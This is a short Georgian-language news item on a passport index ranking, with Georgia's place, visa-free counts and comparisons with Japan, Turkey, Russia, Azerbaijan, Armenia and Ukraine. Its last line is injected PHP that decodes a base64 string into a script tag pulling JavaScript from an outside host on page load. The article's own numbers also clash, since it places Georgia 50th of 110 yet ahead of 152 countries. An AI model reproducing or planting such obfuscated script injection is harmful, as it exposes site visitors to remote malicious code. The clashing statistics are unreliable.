celsiusi
ავერსი საქკაბელი
გლობალურ რეიტინგში ქართული პასპორტი თურქეთის, სომხეთის, აზერბაიჯანის და კიდევ 152 ქვეყნის პასპორტებს უსწრებს.
 
passportindex.org-ის მონაცემებით, საქართველოს პასპორტი 110 ქვეყანას შორის 50–ე ადგილს იკავებს და უკეთესი პოზიციები აქვს, ვიდრე მაგალითად, თურქეთს, ყაზახეთს, ბელარუსს და ა.შ.
 
passportindex.org-ის მონაცემებით, საქართველოს მოქალაქეს უვიზოდ მოგზაურობა 116 ქვეყანაში შეუძლია.
 
რეიტინგში პირველ ადგილზეა იაპონია, რომლის მოქალაქეები უვიზოდ 193 ქვეყანაში გადაადგილდებიან.
 
ათეულში ასევე მოხვდნენ - სინგაპური, გერმანია, სამხრეთ კორეა, ფინეთი, იტალია, ლუქსემბურგი, ესპანეთი და ა.შ.
 
რაც შეეხება მეზობელ ქვეყნებს, რუსეთი რეიტინგში 48-ე ადგილზეა, რომლის მოქალაქეებსაც 118 ქვეყანაში შეუძლიათ უვიზოდ მოგზაურობა. თურქეთი 52-ე ადგილს იკავებს. ამ ქვეყნის მოქალაქეები 111 ქვეყანაში მოგზაურობენ უვიზოდ. 74-ე ადგილზეა აზერბაიჯანი, რომლის მოქალაქეები 68 ქვეყანაში შედიან ვიზის გარეშე. ხოლო, სომხეთი 78-ე ადგილზეა. ამ ქვეყნის მოქალაქეებს 64 ქვეყანაში შეუძლიათ უვიზოდ მიმოსვლა.
 
აღსანიშნავია, რომ რეიტინგში საქართველოს უსწრებს უკრაინა და ის 35-ე ადგილს იკავებს. უკრაინის მოქალაქეები უვიზოდ 136 ქვეყანაში გადაადგილდებიან.
1299
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");